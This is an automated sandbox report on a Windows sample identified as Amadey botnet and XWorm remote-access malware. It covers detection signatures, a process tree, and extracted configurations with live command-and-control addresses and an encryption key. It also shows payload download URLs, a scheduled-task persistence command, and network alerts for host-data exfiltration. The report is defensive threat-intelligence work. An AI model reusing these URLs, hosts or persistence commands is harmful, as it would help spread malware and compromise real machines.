Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565749
MD5:795dc87c1af119b6d27e01167fc129d2
SHA1:42c70518b0ce7aea4bafc32f8b3ef114febfed40
SHA256:f9d0e9d1c7d55d226e049475be712fc1f9cd619b5e04cf615c0ad1274277341b
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 795DC87C1AF119B6D27E01167FC129D2)
    • skotes.exe (PID: 7520 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 795DC87C1AF119B6D27E01167FC129D2)
  • skotes.exe (PID: 7636 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 795DC87C1AF119B6D27E01167FC129D2)
  • skotes.exe (PID: 2640 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 795DC87C1AF119B6D27E01167FC129D2)
    • cAvEmnl.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe" MD5: EFD5937F50C21B5CE660D67F3F995821)
      • schtasks.exe (PID: 7472 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • EJQ2xs8.exe (PID: 7668 cmdline: "C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe" MD5: 7AC5198E128DEDA55EEEB6CCFC8B57EA)
  • github.exe (PID: 7352 cmdline: C:\Users\user\AppData\Roaming\github.exe MD5: EFD5937F50C21B5CE660D67F3F995821)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["179.43.171.209"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Roaming\github.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xb828:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xb8c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xb9da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xb664:$cnc4: POST / HTTP/1.1
        C:\Users\user\AppData\Roaming\github.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xb828:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xb8c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xb9da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xb664:$cnc4: POST / HTTP/1.1
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xb4c8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xb565:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xb67a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xb304:$cnc4: POST / HTTP/1.1
          00000007.00000000.2443615567.00000000000E8000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000007.00000000.2443615567.00000000000E8000.00000002.00000001.01000000.00000009.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x7a28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x7ac5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x7bda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x7864:$cnc4: POST / HTTP/1.1
            00000002.00000003.1718912522.0000000004BC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              Click to see the 16 entries
              SourceRuleDescriptionAuthorStrings
              12.2.EJQ2xs8.exe.7d0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                12.2.EJQ2xs8.exe.7d0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x7342:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x73df:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x74f4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x717e:$cnc4: POST / HTTP/1.1
                7.0.cAvEmnl.exe.e0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  7.0.cAvEmnl.exe.e0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0xb828:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0xb8c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0xb9da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xb664:$cnc4: POST / HTTP/1.1
                  0.2.file.exe.c70000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    Click to see the 3 entries

                    System Summary

                    barindex
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, ProcessId: 5496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\github.lnk
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, ParentProcessId: 5496, ParentProcessName: cAvEmnl.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe", ProcessId: 7472, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, ParentProcessId: 5496, ParentProcessName: cAvEmnl.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe", ProcessId: 7472, ProcessName: schtasks.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T18:08:54.929960+010020446231A Network Trojan was detected192.168.2.449860185.215.113.4380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T18:08:20.742546+010020446961A Network Trojan was detected192.168.2.449784185.215.113.4380TCP
                    2024-11-30T18:08:34.188264+010020446961A Network Trojan was detected192.168.2.449820185.215.113.4380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T18:08:08.586709+010028561471A Network Trojan was detected192.168.2.449753185.215.113.4380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T18:08:16.743019+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449769TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T18:08:14.041214+010028033053Unknown Traffic192.168.2.44977531.41.244.1180TCP
                    2024-11-30T18:08:27.266910+010028033053Unknown Traffic192.168.2.44980531.41.244.1180TCP
                    2024-11-30T18:08:38.320632+010028033053Unknown Traffic192.168.2.449823185.215.113.1680TCP
                    2024-11-30T18:08:40.968449+010028033053Unknown Traffic192.168.2.449837185.215.113.1680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T18:08:24.164103+010028528701Malware Command and Control Activity Detected179.43.171.2097000192.168.2.449785TCP
                    2024-11-30T18:08:32.028312+010028528701Malware Command and Control Activity Detected179.43.171.2097000192.168.2.449785TCP
                    2024-11-30T18:08:46.447980+010028528701Malware Command and Control Activity Detected179.43.171.2097000192.168.2.449785TCP
                    2024-11-30T18:08:54.174046+010028528701Malware Command and Control Activity Detected179.43.171.2097000192.168.2.449785TCP
                    2024-11-30T18:09:00.618246+010028528701Malware Command and Control Activity Detected179.43.171.2097000192.168.2.449785TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T18:08:32.033547+010028529231Malware Command and Control Activity Detected192.168.2.449785179.43.171.2097000TCP
                    2024-11-30T18:08:46.449937+010028529231Malware Command and Control Activity Detected192.168.2.449785179.43.171.2097000TCP
                    2024-11-30T18:09:00.664462+010028529231Malware Command and Control Activity Detected192.168.2.449785179.43.171.2097000TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T18:08:24.164103+010028528741Malware Command and Control Activity Detected179.43.171.2097000192.168.2.449785TCP
                    2024-11-30T18:08:54.174046+010028528741Malware Command and Control Activity Detected179.43.171.2097000192.168.2.449785TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T18:08:31.606790+010028559241Malware Command and Control Activity Detected192.168.2.449785179.43.171.2097000TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: http://31.41.244.11/files/1824233174/EJQ2xs8.exeAvira URL Cloud: Label: malware
                    Source: http://31.41.244.11/files/1824233174/cAvEmnl.exeAvira URL Cloud: Label: malware
                    Source: http://185.215.113.43/Zu7JuNko/index.php/luma/random.exe450Avira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\EJQ2xs8[1].exeAvira: detection malicious, Label: HEUR/AGEN.1313526
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeAvira: detection malicious, Label: HEUR/AGEN.1313526
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: 00000002.00000003.1718912522.0000000004BC0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                    Source: 00000007.00000002.2895978891.0000000002491000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["179.43.171.209"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 44%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\EJQ2xs8[1].exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\AppData\Roaming\github.exeReversingLabs: Detection: 55%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\github.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\EJQ2xs8[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJoe Sandbox ML: detected
                    Source: file.exeJoe Sandbox ML: detected
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpackString decryptor: 179.43.171.209
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpackString decryptor: 7000
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpackString decryptor: <123456789>
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpackString decryptor: <Xwormmm>
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpackString decryptor: XWorm V5.6
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpackString decryptor: USB.exe
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpackString decryptor: %AppData%
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpackString decryptor: github.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 179.43.171.209:7000 -> 192.168.2.4:49785
                    Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 179.43.171.209:7000 -> 192.168.2.4:49785
                    Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49769
                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49784 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49785 -> 179.43.171.209:7000
                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49785 -> 179.43.171.209:7000
                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49820 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.4:49860 -> 185.215.113.43:80
                    Source: Malware configuration extractorURLs: 179.43.171.209
                    Source: Malware configuration extractorIPs: 185.215.113.43
                    Source: global trafficTCP traffic: 192.168.2.4:49785 -> 179.43.171.209:7000
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 17:08:13 GMTContent-Type: application/octet-streamContent-Length: 52736Last-Modified: Sat, 30 Nov 2024 15:47:02 GMTConnection: keep-aliveETag: "674b3376-ce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 30 4b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 8a 00 00 00 40 00 00 00 00 00 00 0a 60 00 00 00 60 00 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 94 00 00 57 00 00 00 00 20 01 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 48 00 00 00 00 00 00 00 00 00 00 00 55 40 0a 18 0c 37 27 7f 40 36 00 00 00 20 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 58 65 6a 6e 52 00 00 00 10 00 00 00 00 60 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 f4 87 00 00 00 80 00 00 00 88 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ce 04 00 00 00 20 01 00 00 06 00 00 00 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 17:08:27 GMTContent-Type: application/octet-streamContent-Length: 1723904Last-Modified: Sat, 30 Nov 2024 16:06:35 GMTConnection: keep-aliveETag: "674b380b-1a4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 72 30 4b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 7e 00 00 00 08 00 00 00 00 00 00 00 20 44 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 ef b3 1a 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 00 00 69 00 00 00 00 a0 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 38 04 00 00 00 a0 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 29 00 00 e0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 76 70 6e 6d 79 6c 69 00 c0 19 00 00 40 2a 00 00 c0 19 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 68 6c 65 77 6e 68 7a 00 20 00 00 00 00 44 00 00 04 00 00 00 28 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 44 00 00 22 00 00 00 2c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 